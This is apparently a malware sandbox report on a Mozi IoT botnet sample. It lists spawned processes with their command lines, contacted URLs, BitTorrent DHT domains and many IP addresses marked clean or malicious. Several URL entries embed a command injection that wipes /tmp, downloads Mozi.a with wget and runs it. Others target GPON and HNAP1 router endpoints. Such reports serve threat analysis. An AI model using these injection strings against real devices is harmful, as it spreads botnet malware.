iptables -I PREROUTING -t nat -p udp --dport 5353 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 5353 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --sport 5353 -j ACCEPT
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-checkreports
/usr/bin/python3 /usr/share/apport/apport-checkreports --system
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
 clean
There are 155 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://68.233.196.110:80/HNAP1/
68.233.196.110
 malicious
http://%s:%d/bin.sh;chmod
unknown
 malicious
http://127.0.0.1:80/GponForm/diag_Form?images/
34.117.124.80
 malicious
http://104.17.98.63:80/HNAP1/
104.17.98.63
 malicious
http://173.223.142.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
173.223.142.130
 malicious
http://52.64.147.225:80/HNAP1/
52.64.147.225
 malicious
http://85.153.79.234:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
85.153.79.234
 malicious
http://104.73.19.166:80/HNAP1/
104.73.19.166
 malicious
http://184.27.52.100:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
184.27.52.100
 malicious
http://85.95.252.164:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
85.95.252.164
 malicious
http://%s:%d/bin.sh
unknown
 malicious
http://176.122.182.151:80/HNAP1/
176.122.182.151
 malicious
http://172.252.124.171:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
172.252.124.171
 malicious
http://190.166.164.18:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
190.166.164.18
 malicious
http://52.201.62.234:80/HNAP1/
52.201.62.234
 malicious
http://pastebin.ca)
unknown
 clean
http://%s:%d/Mozi.a;chmod
unknown
 clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
 clean
http://%s:%d/Mozi.m;$
unknown
 clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
 clean
http://127.0.0.1
unknown
 clean
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
unknown
 clean
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
unknown
 clean
http://www.alsa-project.org
unknown
 clean
http://www.pastebin.ca/upload.php
unknown
 clean
http://%s:%d/Mozi.m
unknown
 clean
http://www.alsa-project.org/cardinfo-db/
unknown
 clean
http://127.0.0.1sendcmd
unknown
 clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
unknown
 clean
http://13.235.141.230:37215/ctrlt/DeviceUpgrade_1
13.235.141.230
 clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
unknown
 clean
http://ipinfo.io/ip
unknown
 clean
http://%s:%d/Mozi.m;/tmp/Mozi.m
unknown
 clean
http://www.pastebin.ca
unknown
 clean
http://purenetworks.com/HNAP1/
unknown
 clean
http://www.alsa-project.org/alsa-info.sh
unknown
 clean
http://%s:%d/Mozi.m;
unknown
 clean
http://www.alsa-project.org.
unknown
 clean
http://HTTP/1.1
unknown
 clean
http://%s:%d/Mozi.a;sh$
unknown
 clean
http://www.pastebin.ca.
unknown
 clean
http://schemas.xmlsoap.org/soap/envelope//
unknown
 clean
http://222.236.20.88:49152/soap.cgi?service=WANIPConn1
222.236.20.88
 clean
There are 33 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dht.transmissionbt.com
87.98.162.88
 clean
bttracker.acc.umu.se
130.239.18.159
 clean
router.bittorrent.com
67.215.246.10
 clean
router.utorrent.com
82.221.103.244
 clean
bttracker.debian.org
unknown
 clean

IPs

IP
Domain
Country
Active
Malicious
111.185.181.169
unknown
Taiwan; Republic of China (ROC)
unknown
 malicious
97.75.153.94
unknown
United States
unknown
 malicious
170.108.229.35
unknown
United States
unknown
 clean
169.109.182.90
unknown
United States
unknown
 clean
167.151.41.249
unknown
United States
unknown
 clean
160.157.215.58
unknown
Tunisia
unknown
 clean
91.76.37.43
unknown
Russian Federation
unknown
 clean
88.1.239.79
unknown
Spain
unknown
 clean
201.8.221.107
unknown
Brazil
unknown
 clean
159.204.183.75
unknown
United States
unknown
 clean
147.200.251.34
unknown
Australia
unknown
 clean
154.45.216.205
unknown
United States
unknown
 clean
170.109.123.136
unknown
United States
unknown
 clean
61.77.98.141
unknown
Korea Republic of
unknown
 clean
223.155.36.174
unknown
China
unknown
 clean
135.53.228.40
unknown
United States
unknown
 clean
176.248.82.68
unknown
United Kingdom
unknown
 clean
171.131.146.1
unknown
United States
unknown
 clean
201.233.149.101
unknown
Colombia
unknown
 clean
221.65.136.75
unknown
Japan
unknown
 clean
99.147.205.5
unknown
United States
unknown
 clean
170.79.55.160
unknown
Brazil
unknown
 clean
4.0.19.168
unknown
United States
unknown
 clean
192.79.67.208
unknown
United States
unknown
 clean
58.222.87.135
unknown
China
unknown
 clean
114.3.158.246
unknown
Indonesia
unknown
 clean
33.216.73.164
unknown
United States
unknown
 clean
84.37.51.95
unknown
France
unknown
 clean
5.139.220.125
unknown
Russian Federation
unknown
 clean
58.77.57.138
unknown
Korea Republic of
unknown
 clean
172.95.177.246
unknown
United States
unknown
 clean
93.220.218.152
unknown
Germany
unknown
 clean
214.128.251.204
unknown
United States
unknown
 clean
187.178.106.53
unknown
Mexico
unknown
 clean
148.144.86.87
unknown
United States
unknown
 clean
40.77.4.165
unknown
United States
unknown
 clean
207.168.147.166
unknown
United States
unknown
 clean
112.234.3.209
unknown
China
unknown
 clean
119.18.79.138
unknown
Korea Republic of
unknown
 clean
136.17.125.150
unknown
United States
unknown
 clean
112.197.177.142
unknown
Viet Nam
unknown
 clean
6.202.86.157
unknown
United States
unknown
 clean
117.60.217.40
unknown
China
unknown
 clean
197.204.152.220
unknown
Algeria
unknown
 clean
137.32.169.4
unknown
United States
unknown
 clean
3.110.190.131
unknown
United States
unknown
 clean
81.54.152.81
unknown
France
unknown
 clean
105.196.8.55
unknown
Egypt
unknown
 clean
105.25.217.164
unknown
Mauritius
unknown
 clean
169.173.126.123
unknown
United States
unknown
 clean
57.99.238.88
unknown
Belgium
unknown
 clean
134.247.139.110
unknown
Germany
unknown
 clean
165.69.88.89
unknown
Australia
unknown
 clean
66.131.172.140
unknown
Canada
unknown
 clean
103.4.42.175
unknown
Japan
unknown
 clean
91.68.153.140
unknown
France
unknown
 clean
174.248.113.180
unknown
United States
unknown
 clean
37.145.1.63
unknown
Russian Federation
unknown
 clean
157.194.246.3
unknown
United States
unknown
 clean
153.158.34.130
unknown
Japan
unknown
 clean
86.100.251.184
unknown
Lithuania
unknown
 clean
157.116.228.108
unknown
Japan
unknown
 clean
157.52.50.34
unknown
United States
unknown
 clean
151.44.94.207
unknown
Italy
unknown
 clean
194.189.0.209
unknown
United Kingdom
unknown
 clean
206.116.81.106
unknown
Canada
unknown
 clean
37.26.220.89
unknown
Norway
unknown
 clean
18.83.153.48
unknown
United States
unknown
 clean
172.138.55.56
unknown
United States
unknown
 clean
78.239.138.225
unknown
France
unknown
 clean
190.216.209.174
unknown
Argentina
unknown
 clean
29.54.98.88
unknown
United States
unknown
 clean
26.20.176.82
unknown
United States
unknown
 clean
58.98.0.84
unknown
Japan
unknown
 clean
183.168.111.212
unknown
China
unknown
 clean
106.187.85.86
unknown
Japan
unknown
 clean
74.224.191.111
unknown
United States
unknown
 clean
24.78.103.243
unknown
Canada
unknown
 clean
111.224.91.153
unknown
China
unknown
 clean
18.210.13.68
unknown
United States
unknown
 clean
192.19.254.53
unknown
United States
unknown
 clean
222.240.82.124
unknown
China
unknown
 clean
133.4.40.28
unknown
Japan
unknown
 clean
160.118.8.178
unknown
South Africa
unknown
 clean
59.18.131.116
unknown
Korea Republic of
unknown
 clean
163.212.48.150
unknown
Japan
unknown
 clean
110.72.210.139
unknown
China
unknown
 clean
44.134.174.174
unknown
United States
unknown
 clean
104.208.243.62
unknown
United States
unknown
 clean
45.148.96.51
unknown
Netherlands
unknown
 clean
202.144.169.171
unknown
Australia
unknown
 clean
207.6.190.120
unknown
Canada
unknown
 clean
215.93.198.247
unknown
United States
unknown
 clean
98.101.97.159
unknown
United States
unknown
 clean
125.134.6.76
unknown
Korea Republic of
unknown
 clean
5.14.105.137
unknown
Romania
unknown
 clean
182.23.203.242
unknown
China
unknown
 clean
217.142.216.81
unknown
Sweden
unknown
 clean
87.197.254.225
unknown
Slovakia (SLOVAK Republic)
unknown
 clean
96.227.126.40
unknown
United States
unknown
 clean
There are 90 hidden IPs, click here to show them.